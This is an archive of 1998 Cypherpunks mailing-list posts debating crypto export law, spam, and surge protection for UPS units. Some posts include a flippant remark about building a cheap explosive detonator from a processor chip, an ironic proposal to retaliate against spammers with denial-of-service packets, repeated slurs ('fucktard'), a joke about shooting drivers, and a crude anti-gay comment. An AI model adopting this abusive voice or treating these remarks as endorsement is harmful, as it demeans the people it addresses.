From: Dave Emery <die@die.com>
Date: Fri, 20 Mar 1998 10:14:58 -0800 (PST)
To: Mike Rosing <cryptech@Mcs.Net>
Subject: Re: reference
In-Reply-To: <v04003a36b136e6994efd@[139.167.130.246]>
Message-ID: <19980320131536.57966@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, Mar 19, 1998 at 11:00:02PM -0600, Mike Rosing wrote:
> Cryptography is a weapon.  With a wire wrap tool, you too can create
> weapons of mass destruction using nothing but untracable legal parts.  
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^


	I'll bite, how ?   Crypto is not a destructive weapon - it may
blind the opponent, perhaps even sometimes at critical times when that
can induce him to behave dangerously - but I fail to see how a cipher in
and of itself is a weapon of destruction, let alone mass destruction.  I
see crypto as an entirely defensive weapon with no potential to destroy
anything (except perhaps data when the key gets lost or forgotten).

	Of course you may be refering to other things one can put
together with a wirewrap tool - which isn't really the tool one would
want to assemble HERF or HPM destructive weapons with in any case
since wirewrap wire can barely handle an amp or so max...
	

	

> 
> Patience, persistence, truth,
> Dr. mike
> 

-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rosing <cryptech@Mcs.Net>
Date: Fri, 20 Mar 1998 11:46:35 -0800 (PST)
To: Dave Emery <die@die.com>
Subject: Re: reference
In-Reply-To: <19980320131536.57966@die.com>
Message-ID: <Pine.BSF.3.95.980320133804.6518B-100000@Venus.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 20 Mar 1998, Dave Emery wrote:

> 	I'll bite, how ?   Crypto is not a destructive weapon - it may
> blind the opponent, perhaps even sometimes at critical times when that
> can induce him to behave dangerously - but I fail to see how a cipher in
> and of itself is a weapon of destruction, let alone mass destruction.  I
> see crypto as an entirely defensive weapon with no potential to destroy
> anything (except perhaps data when the key gets lost or forgotten).

By government fiat, not by reality.  Crypto is *classified* as a weapon,
so you stick a processor in a box with a keypad and scramble inputs to
outputs and you have a device which is on the munitions list along with
tanks and jet fighters.  Pistols and rifles aren't weapons of mass
destruction so they aren't on the munitions list, but crypto is.  So, by
fiat, it is a "weapon of mass destruction".

it's Sarcasim dude, and points out how stupid the law can be.  I'll take a
battery operated wire wrap tool, but even a hand job and candle light will
do.

As for the high explosives, processors are good at timing.  You can build
a pretty cheap detonator with some fancy properties using a $10 processor
chip.  With a couple of transistors you'll get more than enough current
to do the job, the wires won't be connected that long :-)

Patience, persistence, truth,
Dr. mike






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@dev.null>
Date: Fri, 20 Mar 1998 12:28:15 -0800 (PST)
To: Yupin Mungdee <snickers@mejl.com>
Subject: Does Spamming Really Exist? / Re: Will New Sendmail Block Remailers?
In-Reply-To: <Pine.SOL.3.96.980319045525.2632A-100000@rigel.cyberpass.net>
Message-ID: <3512E780.5FBD@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


Yupin Mungdee wrote:
> 
> Another possible "ultimate end" for the spammer wars would be making
> spamming illegal, like fax spamming, and having the cops hunting down the
> spammers. But that can be defeated with truly anonymous markets, still
> assuming that encryption will be legal.

Spamming is an 'imaginary' felony, as are anonymity and encryption.

The only real crime taking place on the InterNet is the marriage of
an underage technology to a polygamous pen full of Sheeple whose
dowry consists of an evolutionary heritage of worshipping whatever
it is that they don't understand and following the Ram(it up your
ass) with the biggest horns and the loudest bleat.

> To really beat spamming we probably need filters that only allow messages
> from inside our web of trust. Don't you agree?

Complaining about 'spamming' is the equivalent of going to a Reservation
and complaining that "there's too damn many Indians" around.

"Doctor, it hurts when I do *this*..."
	"Then don't do *that*!"

I don't post under my own name on USENET for a simple reason. When I do,
I get mountains of spam.
I do subscribe to cypherpunks through an unfilted toad.com and I get a
few niggling spams a day that merely serve to remind me that the
'spammers'
are out there, laying in wait.

I don't live in Los Angelos for a simple reason. Within the first week
of
driving in traffic there, I would take out an Uzi and start blowing the
other drivers away at random.
I do make occassional forays into large cities such as LA and Phoenix
when
I want/need to do business or pleasure there, but when merely passing
through, I do so at 4 a.m., in order to avoid the 'road spam'.

The WorldWide Web is just that...a 'web'. If you want to traverse every
part of it, just 'surfing' without using any kind of judgement or
discrimination, then you can expect to get 'stuck' with whatever kind
of substance is being used by those constructing that particular part
of the web.
When I go into the part of the web that John Perry has thrown his
Net over and marked as his territory, my gut-reaction is to think of
him as a dickhead, Nazi censor. Realistically, this would be true
if he trod over to my few strands of webspace and tried to rule over
it, but my willfully traversing into his domain and whining about
how he acts within it is nothing more than egoism.
Those who choose to participate with John Perry in the construction
and maintenance of the web of trust/competency that he is involved
in have certain expectations of free communications versus limitations
of speech and action. Those who choose to participate in the 
construction/destruction of the CypherPunks lists can expect to be
barraged by all manner of sanity/insanity, and to have to judge the 
value of the list for themselves in deciding whether to stay or to 
leave. (Relying on the CypherPunks Complaint Department to 'solve'
this or that 'problem' is not a viable option.)

"Doctor, I get 'spammed' when I go there..."
	"Then don't go there..."

OldDocMonger





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Fri, 20 Mar 1998 14:58:30 -0800 (PST)
To: David Scheidt <david@infocom.com>
Subject: Re: Does Spamming Really Exist? / Re: Will New Sendmail Blo
Message-ID: <199803202258.OAA09440@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


David:

Blah blah blah, theft of services, blah, oh mr. government: please 
deliver us from spam, blah, blah, blah.  TruthMonger wrote one on the 
best pieces on spam, and you come up with the same old SHIT!  Just 
because you repeat "theft of services" won't make it true.  Blah 
blah, make spammers pay blah blah.  Shut up, and hit delete!  You 
fucktard.

Spam is not crime, it is commerce!

On or About 20 Mar 98 at 17:06, David Scheidt wrote:

> On Fri, 20 Mar 1998, TruthMonger wrote:
> 
> > Spamming is an 'imaginary' felony, as are anonymity and
> > encryption.
> 
> Spamming is theft of services, sir.  I am forced to pay for a
> "service" that I did not request.  I, and everyone else, pays for
> spam either directly in connect time, or because my ISP wastes
> bandwidth handling the stuff.  I am not that much bothered by that
> it is advertising, or pure junk, but that I pay for it.
> 
> > > To really beat spamming we probably need filters that only allow
> > > messages from inside our web of trust. Don't you agree?
> 
> Make people bear the true cost of spam, and it will stop.
> 

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://ross.adnetsol.com
Voice: (408) 259-2795




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Fri, 20 Mar 1998 15:10:45 -0800 (PST)
To: David Scheidt <david@infocom.com>
Subject: Re: Does Spamming Really Exist? / Re: Will New Sendmail Blo
Message-ID: <199803202310.PAA09594@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 20 Mar 98 at 18:05, David Scheidt wrote:

> On Fri, 20 Mar 1998, Ross Wright wrote:
> 
> > Spam is not crime, it is commerce!
> 
> Spam is commerce with the costs borne by the wrong party.  

Blah blah blah.  I'm bored with this SHIT.  Blah blah blah.  

Like the TruthMonger said, you roll around on the floor with the
dogs, you gonna get licked on the mouth.  

Spam is a fact of life, and complaining about it is far worse than
spam.  Again, I say:  hit your delete key and shut up, you fucktard.

Thanks.

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://ross.adnetsol.com
Voice: (408) 259-2795




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Fri, 20 Mar 1998 15:26:21 -0800 (PST)
To: Ian Briggs <ian@deepwell.com>
Subject: Complaints about spam are TRUE theft of services
Message-ID: <199803202326.PAA09734@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 19 Mar 98 at 14:27, Ian Briggs wrote:

> >> Spamming is an 'imaginary' felony, as are anonymity and
> >> encryption.
> 
> No, its actually theft of services.  

No, actually your complaints about spam are TRUE theft of 
services.  In an article that I posted to this list last year it says 
the following:

Mailing-list spammers

Email spam is the favorite gripe of most Netizens, excepting the
spammers. Congress is considering legislation [25] to limit the
practice of sending unwanted commercial email in bulk. Not everyone
thinks this is a good idea. See [26] for a thread from an ongoing
debate on Declan McCullagh's fight-censorship mailing list. George
Matyjewicz <mosaic1 at ix dot netcom dot com> did a modest experiment
on a week's worth of his email -- he is on 56 mailing lists and gets
around 200 messages a day -- to gauge how widespread the problem
actually is. Matyjewicz posted these results: 

Total messages...1,354...193.4

Spam messages.......10.......1.4.....< 1 %

Spam complaints....189.......27.0.....14 %

This article is at:

http://206.215.211.222/archive/0108.html

Spam is not crime, it's commerce.  Shut up and hit that delete key, 
you fucktard.

Thanks.

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://ross.adnetsol.com
Voice: (408) 259-2795




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Fri, 20 Mar 1998 15:43:20 -0800 (PST)
To: Ian Briggs <ian@deepwell.com>
Subject: Re: Complaints about spam are TRUE theft of services
Message-ID: <199803202343.PAA09849@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 19 Mar 98 at 15:31, Ian Briggs wrote:

> >Spam is not crime, it's commerce.  Shut up and hit that delete key,
> > you fucktard.
> 
> Its not commerce, its collect calls and fuck you.  Fax bombing is
> illegal.
> 
> Unsolicitated e-mail of this nature will eventually also be.

Is that *really* what you want?

>> Not because its "dangerous" to the internet, there are a lot more
> dangerous issues facing todays Internet, because organized ISP have
> enough power to tell cluless lawmakers it is.

Again, I ask: "Is that *REALLY* what you want?"  You want stupid 
congressmen and women to make new laws about spam???  Are you nuts?

*Really*, you want them sticking their small minds into the internet? 
*REALLY*??????

You and all your "organized ISP" brothers should just shut up and hit 
the delete keys, you bunch of fucktards.

Thanks.

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://ross.adnetsol.com
Voice: (408) 259-2795




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Spectre <spectre@anthrax.net>
Date: Fri, 20 Mar 1998 13:23:58 -0800 (PST)
To: StanSquncr@aol.com
Subject: Re: UPSs (yeah, it's off topic)
In-Reply-To: <199803202103.NAA06318@yginsburg.el.nec.com>
Message-ID: <B0000003927@hades.crmcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 16:03 3/20/98 , Bob De Witt wrote:

>Stan needs to review his basic electronics.  Yes, it will even protect
>against lighting if designed for that purpose.  Costs vary accordingly ...

I think stan just confused UPS's with power strips.

most of them don't have a switching time fast enough to stop lightning.


-The Spectre [SP4 w/ clam cluster]
-http://www.anthrax.net/cos
"The surest way to corrupt a youth is to instruct him to hold in higher
esteem those who think alike than those who think differently."
		-- Neitzsche, _The_Dawn_
PGP key available from servers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 20 Mar 1998 18:07:37 -0800 (PST)
To: Ian Briggs <cypherpunks@toad.com
Subject: How government _can_ help stop spam - Re: Does Spamming Really Exist?
In-Reply-To: <Pine.BSF.3.96.980320170009.29187A-100000@infocom.com>
Message-ID: <3.0.5.32.19980320164218.008e1b20@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>> Spamming is an 'imaginary' felony, as are anonymity and encryption.
>No, its actually theft of services.  

Generally, it's neither one, but it is a rude imposition on
the reader's attention, and may also increase costs to the user
or the user's service provider.

So what's an anarchist like me doing saying that the government can help?
Well, they can help by getting out of the way.  
Currently, there are laws against breaking into computer systems
and against denial of service attacks; they can be Federal felonies.

As a modest proposal, I would suggest that the government allow
anyone who's been sent unwanted bits by a spammer to send
any unwanted bits they feel like in return.
Maybe Spamford doesn't want chain letters about
	"Make Pings Of Death Fast"
or	"Free Live Chat With Real Spammers!"
but spammers really aren't in any position to complain.


----------------
There's also 
http://www.iks-jena.de/mitarb/lutz/usenet/teergrube.en.html

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Fri, 20 Mar 1998 13:52:38 -0800 (PST)
To: n9505834@garbo.nepean.uws.edu.au
Subject: Re: Chicken "anons" and "nobody's"
Message-ID: <b42996e8.3512e4ba@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-19 16:58:32 EST, n9505834@garbo.nepean.uws.edu.au
writes:

<< > << Well, Stan, all of the news you read ultimately comes from the one
person
 >  selected by Clinton to drive The Propoganda Machine up in Washington, DC.
>>
 > 
 > And what planet do you live on?
 
 Yar, everybody knows that it is Rupid Murdoc who runs all the news. >>

Well, he runs a large part of the 'show' (Fox news (which has on all the
Republican't favorites on sundays)).

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Fri, 20 Mar 1998 13:52:07 -0800 (PST)
To: mgraffam@mhv.net
Subject: Re: A little Paranoid, William?
Message-ID: <e8d11de8.3512e4bc@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-19 18:21:57 EST, mgraffam@mhv.net writes:

<< I've heard it said 'Paranoia is reality on a finer scale.'
 
 I believe it.
 
 If you think that signing messages is paranoia, you may be right.. I,
 for one, _am_ paranoid. I know the practical attacks that can be made,
 and I've seen them work and, and demonstrated how easy they are.
 Worse, I've experienced them. Maybe you haven't .. and thats good.
 I hope your good luck continues. >>

Actually, my presence here amongst the cypherpunks is a direct RESULT of one
of those attacks.  But I can deal with it without getting paranoid.

And you might be correct about paranoia and reality.

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Fri, 20 Mar 1998 13:51:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: UPSs
Message-ID: <9300db85.3512e4bd@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-19 18:48:51 EST, Shane.Pearson@tafensw.edu.au writes:

<< A simple low pass filter made of 2 large inductors and a
 few high voltage capacitors will do the trick nicely. >>

Right.  The filtering that's already in the power-supply (except that the
switching transformer isn't as big as an inductor as a normal old-style power
transformer.

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Fri, 20 Mar 1998 13:52:40 -0800 (PST)
To: mgraffam@mhv.net
Subject: Re: UPSs
Message-ID: <76f6bc68.3512e4bd@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-19 18:29:55 EST, mgraffam@mhv.net writes:

<< >BUT, even the fastest electronics cannot respond fast enough to the
initial
 >spike, if that spike is too high in the first place (if your incoming power
 >lines get hit by lightning, for instance), it's already too late.  My
 >suggestion, don't trust a UPS to eliminate spikes, get it if you
 > anticipate a need for back-up power to shut down your system in case of
 > black-out (and screw the surge protectors, trust the filtering in your
 > power supply to do that for you.)
 
 See.. now.. you're clearly talking about power protection.. but, you see
 we _weren't_ talking about power outages, we were talking about
 compromising emanations being sent through power lines.. and as far
 as the UPS goes, whether or not a UPS would help such muffle such
 emanations. >>

Right.  That's why I pointed out that you shouldn't use a UPS and expect it to
prevent large surges (such as the type that occurs when lightning hits your
incoming power.

So, my statement was NOT stupid, your attack on it was.  :-)

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Fri, 20 Mar 1998 13:52:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Chicken "anons" and "nobody's"
Message-ID: <51df9de8.3512e4c1@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-20 15:56:14 EST, nobody@REPLAY.COM writes:

<< Stan, whose mind is held hostage by the heathens at A(h)OL, >>

You idiot, AOL is with YOU (AOL is part of the 'vast right-wing conspiracy')!

See my political page.

Stan,
http://members.aol.com/StanSquncr/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Fri, 20 Mar 1998 13:56:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: UPSs
Message-ID: <24e219e8.3512e4c1@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-20 16:04:24 EST, rdew@el.nec.com writes:

<< If your surge protector is a semi-conductor, it probably will be 
 self-limiting.  That is, it will reach a maximum block, and pass
 whatever is above that.  >>

Yes, but what you fail to point out, is the reason it will pass everything, it
will have been blown (shorted, most likely).

So, because you failed to point this out, I figure the rest of your response
isn't worth responding to.

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Fri, 20 Mar 1998 13:54:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: UPSs (yeah, it's off topic)
Message-ID: <10a39b7a.3512e54d@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-20 16:23:56 EST, spectre@anthrax.net writes:

<< At 16:03 3/20/98 , Bob De Witt wrote:
 
 >Stan needs to review his basic electronics.  Yes, it will even protect
 >against lighting if designed for that purpose.  Costs vary accordingly ...
 
 I think stan just confused UPS's with power strips. >>

Obviously, you're just confused.   :-)
 
<< PGP key available from servers. >>

So where's your PGP signiture?

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Scheidt <david@infocom.com>
Date: Fri, 20 Mar 1998 14:06:36 -0800 (PST)
Subject: Re: Does Spamming Really Exist? / Re: Will New Sendmail Block Remailers?
In-Reply-To: <3512E780.5FBD@dev.null>
Message-ID: <Pine.BSF.3.96.980320170009.29187A-100000@infocom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Mar 1998, TruthMonger wrote:

> Spamming is an 'imaginary' felony, as are anonymity and encryption.

Spamming is theft of services, sir.  I am forced to pay for a "service"
that I did not request.  I, and everyone else, pays for spam either
directly in connect time, or because my ISP wastes bandwidth handling the
stuff.  I am not that much bothered by that it is advertising, or pure
junk, but that I pay for it.

> > To really beat spamming we probably need filters that only allow messages
> > from inside our web of trust. Don't you agree?

Make people bear the true cost of spam, and it will stop.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Spectre <spectre@anthrax.net>
Date: Fri, 20 Mar 1998 14:15:14 -0800 (PST)
To: StanSquncr <cypherpunks@toad.com
Subject: Re: UPSs (yeah, it's off topic)
In-Reply-To: <10a39b7a.3512e54d@aol.com>
Message-ID: <B0000003934@hades.crmcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 16:53 3/20/98 -0500, StanSquncr wrote:

>Obviously, you're just confused.   :-)

hmm?  heh.. hey, I was just trying to help you out man.. I haven't heard of
a UPS that won't protect against a lightning strike..

>So where's your PGP signiture?

I get bitched at by list members when I sign my messages.. :)  If I have
something important to say, I'll sign it.. same goes if people start faking
them, so far no one has.


-The Spectre [SP4 w/ Clam Cluster]
-http://www.anthrax.net/cos
"No man is clever enough to know all the evil he does."  -  La Rochefoucauld





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Scheidt <david@infocom.com>
Date: Fri, 20 Mar 1998 15:05:41 -0800 (PST)
To: Ross Wright <rwright@adnetsol.com>
Subject: Re: Does Spamming Really Exist? / Re: Will New Sendmail Blo
In-Reply-To: <199803202258.RAA17285@infocom.com>
Message-ID: <Pine.BSF.3.96.980320180332.13504A-100000@infocom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Mar 1998, Ross Wright wrote:

> Spam is not crime, it is commerce!

Spam is commerce with the costs borne by the wrong party.  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sphantom <shadow@tfs.net>
Date: Fri, 20 Mar 1998 16:13:10 -0800 (PST)
To: StanSquncr <StanSquncr@aol.com>
Subject: Re: UPSs
In-Reply-To: <7341d3ab.3511906d@aol.com>
Message-ID: <35130631.B046F2DA@tfs.net>
MIME-Version: 1.0
Content-Type: text/plain


some protection is better than none. my roommate and I have our
computers in the same room off of the same outlet but my computer has an
UPS and his does not. During a storm, lightning hit near the apartment
building and it took out his computer but not mine. But I do have a
friend who lost his computer to a direct strike to the power lines and
it took out the surge strip as well. At least in my case, it was not a
direct strike into the power lines but what happened to my roommate made
him get an UPS to at least have some protection next time. At least he
will not have to possibly shell out another $1,500 for another computer.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Fri, 20 Mar 1998 16:06:21 -0800 (PST)
To: Ross Wright <rwright@adnetsol.com>
Subject: Re: Complaints about spam are TRUE theft of services
In-Reply-To: <199803202343.PAA09849@toad.com>
Message-ID: <35132F8D.15FF@acm.org>
MIME-Version: 1.0
Content-Type: text/plain


Ross Wright wrote:
> 
> On or About 19 Mar 98 at 15:31, Ian Briggs wrote:
> 
> > >Spam is not crime, it's commerce.  Shut up and hit that delete key,
> > > you fucktard.
> >
> > Its not commerce, its collect calls and fuck you.  Fax bombing is
> > illegal.
> >
> > Unsolicitated e-mail of this nature will eventually also be.
> 
> Is that *really* what you want?
> 
> >> Not because its "dangerous" to the internet, there are a lot more
> > dangerous issues facing todays Internet, because organized ISP have
> > enough power to tell cluless lawmakers it is.
> 
> Again, I ask: "Is that *REALLY* what you want?"  You want stupid
> congressmen and women to make new laws about spam???  Are you nuts?
> 
> *Really*, you want them sticking their small minds into the internet?
> *REALLY*??????
> 
> You and all your "organized ISP" brothers should just shut up and hit
> the delete keys, you bunch of fucktards.
> 
> Thanks.
> 
> =-=-=-=-=-=-
> Ross Wright
> King Media: Bulk Sales of Software Media and Duplication Services
> http://ross.adnetsol.com
> Voice: (408) 259-2795

While I do not completely agree with the tone of the comments, nor do I
buy the specific numbers involved, I have found that the mouthing off
about the terror of Spam to take more bandwidth than the (EMail) spam
itself does.  I also fear legislative involvement much more than the
spam itself.

OTOH I dislike spam intensely and do reufse to buy from a spammer --
even when they occasionally have a toy I just might want under other
circumstances.

PHM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spammer <spam@dev.null>
Date: Fri, 20 Mar 1998 18:10:17 -0800 (PST)
To: paulmerrill@acm.org
Subject: New Champion! / Re: Complaints about spam are TRUE theft of services
In-Reply-To: <199803202343.PAA09849@toad.com>
Message-ID: <351331C7.1CE4@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


Paul H. Merrill wrote:
> 
> While I do not completely agree with the tone of the comments, nor do I
> buy the specific numbers involved, I have found that the mouthing off
> about the terror of Spam to take more bandwidth than the (EMail) spam
> itself does.  I also fear legislative involvement much more than the
> spam itself.

While TruthMonger's initial post, "Does Spamming Really Exist," was
obviously an attempt to lure Ross Wright out of the lair from which
he lurks, furtively monitoring the CypherPunks list, his secondary 
goal was undoubtedly to laugh up his sleeve at the posters who would
inundate the list with a quantity of yea-nay's which would vastly
exceed the amount of spam which is passed on to subscribers of the
unfiltered toad.com CypherPunks list.

A communique from TruthMonger, shortly before he transmorgatized into
his 'Spammer' persona, informed me that he felt Paul Merrill had 
earned the title of Chief Spammer SpokesPerson/Champion, despite the
heartfelt compliment that Ross Wright gave TM in one of his missives.

The concept of the spam-complainer being the true spammer on any 
given mailing list, by virtue of setting off a mountain of posts
which are in all likelyhood off-topic and meant to appeal only
to the knee-jerk reactions of jerks with knees, is completely in
line with the theory that the only posts which are truly off-topic
on the CypherPunks lists are those which complain about off-topic
posts.

There is a case currently before the Supreme Court of Canada which
is continuing, despite the original plaintiffs having settled out
of court, without government intervention, which will decide 
whether gay couples will be allowed to get butt-fucked under the
same vague, arbitrary and capricious laws as those which are
used to ruin the lives of the heterosexual citizens.

Even radical femnists have had the common sense not to petition
the government to ensure women equal representation in the gas
chambers of America.
Radical anti-spammers should take note...

Spammer






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spammer <spam@dev.null>
Date: Fri, 20 Mar 1998 18:09:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: S p a m  H a i k u  / [Repost]
Message-ID: <35133310.6F46@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


S p a m  H a i k u :

1.
Blue can of steel
What promise do you hold?
Salt flesh so ripe

2.
Can of metal, slick
Soft center, so cool, moistening
I yearn for your salt

3.
Twist, pull the sharp lid
Jerks and cuts me deeply but
Spam, aah, my poultice

4.
Silent, former pig
One communal awareness
Myriad pink bricks

5.
Clad in metal, proud
No mere salt-curing for you
You are not bacon

6
And who dares mock Spam?
You? you? you are not worthy
Of one rich pink fleck

7.
Like some spongy rock
A granite, my piece of Spam
In sunlight on my plate

8.
Little slab of meat
In a wash of clear jelly
Now I heat the pan

9.
Oh tin of pink meat
I ponder what you may be:
Snout or ear or feet?

10.
In the cool morning
I fry up a slab of Spam
A dog barks next door

11.
Pink tender morsel
Glistening with salty gel
What the hell is it?

12.
Ears, snouts and innards
A homogeneous mass
Pass another slice

13.
Old man seeks doctor
"I eat Spam daily", he says.
Angioplasty

14.
Highly unnatural
The tortured shape of this "food"
A small pink coffin

15.
Pink beefy temptress
I can no longer remain
Vegetarian






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Fri, 20 Mar 1998 16:35:06 -0800 (PST)
To: DimVu@aol.com
Subject: My Most Abject Apologies
Message-ID: <3513364E.2938@acm.org>
MIME-Version: 1.0
Content-Type: text/plain


I wish to publicly thank Bill Stewart for pointin out my spelling error
in the account I set up for DV for two reasons 1) I truly dilike anyone
mishandling my own name in print or in pronunciation and 2) a
demonstration needs to be error free or it is a Not Good Thing  (not all
the way to a Bad Thing for a typo, but enough to take a dim view of it)

In this sprirt, I unsubscribed and removed the account and replaced (and
resubscribed) it with DimVu@aol.com 

I apologize to one and all especially DV himself -- I certainly did not
wish to sully his good name thorugh misspelling.

As always,
Your Humble Servant,
Paul H. Merrill

BTW I coulda swore I sent this thing out yesterday, but since I shore
ain't seed it, I (wrote and) sent another.  (I keep no EMail.)
PHM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Roberts <roberts@traderonline.com>
Date: Fri, 20 Mar 1998 11:41:53 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: Re: reference
In-Reply-To: <v04003a36b136e6994efd@[139.167.130.246]>
Message-ID: <3512C840.85AA5E9D@traderonline.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave Emery wrote:

>
>
>         I'll bite, how ?   Crypto is not a destructive weapon - it may
> blind the opponent, perhaps even sometimes at critical times when that
> can induce him to behave dangerously - but I fail to see how a cipher in
> and of itself is a weapon of destruction, let alone mass destruction.  I
> see crypto as an entirely defensive weapon with no potential to destroy
> anything (except perhaps data when the key gets lost or forgotten).

    Imagine in the new realm of white collar crime, individuals are only convicted
because of evidence.  Evidence that can't be decrypted cannot be used.  I see that
going back to defense, but on the wrong side.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spammer <spam@dev.null>
Date: Fri, 20 Mar 1998 18:09:40 -0800 (PST)
To: David Scheidt <david@infocom.com>
Subject: Spam-Busters versus  Spam-Protection Racket / Re: Does Spamming Really Exist?
In-Reply-To: <Pine.BSF.3.96.980320170009.29187A-100000@infocom.com>
Message-ID: <35133C44.5941@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


David Scheidt wrote:
> On Fri, 20 Mar 1998, TruthMonger wrote:
> > Spamming is an 'imaginary' felony, as are anonymity and encryption.
 
> Spamming is theft of services, sir.  I am forced to pay for a "service"
> that I did not request.  I, and everyone else, pays for spam either
> directly in connect time, or because my ISP wastes bandwidth handling the
> stuff.  I am not that much bothered by that it is advertising, or pure
> junk, but that I pay for it.

The thievery is taking place at the ISP level.

I live in the boondocks where the phone company charged $5.00 per 
hour for InterNet access, until they lost their monopoly, after
which their rates magically dropped to $1.00 per hour.
My hook-up rate remains around that rate because of competing
ISP's being required to pay vigorish to the government-owned
teleco, far beyond their actual costs.

If I lived in the 'big city', then I would be able to avail myself
of the $19.95-unlimited-connection charges. Thus, any 'spam' I
received would only cost me my time and energy, as opposed to
the money that the teleco robs me of under cover of their 
government-supported monopoly.

NEWS FLASH!!!
You were born into a world where even your momma's tit competed
for your attention, time and energy.
When your mother's breast-milk dried up, did you petition the
government to have her tit imprisoned under 'Truth In Advertising'
laws? Did you demand that the government force her to refrain
from bringing her tit into your  presence, where it would compete
for your time, attention and energy?

When my mother's breast-milk dried up, I learned to reach for the
bottle (as Anheiser-Busch will gladly verify).
In all of my time on the InterNet, I have responded to and enriched
only one (count 'em, *1*) of the personages who have sent an
unsolicited email to my account. In doing so, however, I have
effectively endorsed the value (be it in an exceedingly minor way)
of those who bring their UCE/Spam to my attention.

You take the position that your ISP 'wastes bandwidth' handling
'spam'. If you are paying them to do so, without requiring that
they provide you with an option in return for the money that you
are paying them, this is not the fault of those who deem that
you may be interested in their product/cause/bullshit.
As well, since the 'spammers' are obviously receiving a response
that makes it worth their while to continue their efforts, it
is obvious that others on your ISP may not regard their missives
as wasted bandwidth.

Sometime ago, plaidworks.com complained about someone 'abusing'
their system by subscribing the CypherPunks list, among others,
to their massive mailings. The fact of the matter was, they left
their system open to being 'used' in the manner it was, in order
to gain maximum profit without going to the expense of putting 
safeguards in place which would prevent others from using the
resources they made available to the InterNet for their own
purposes.

NEWS FLASH!!!
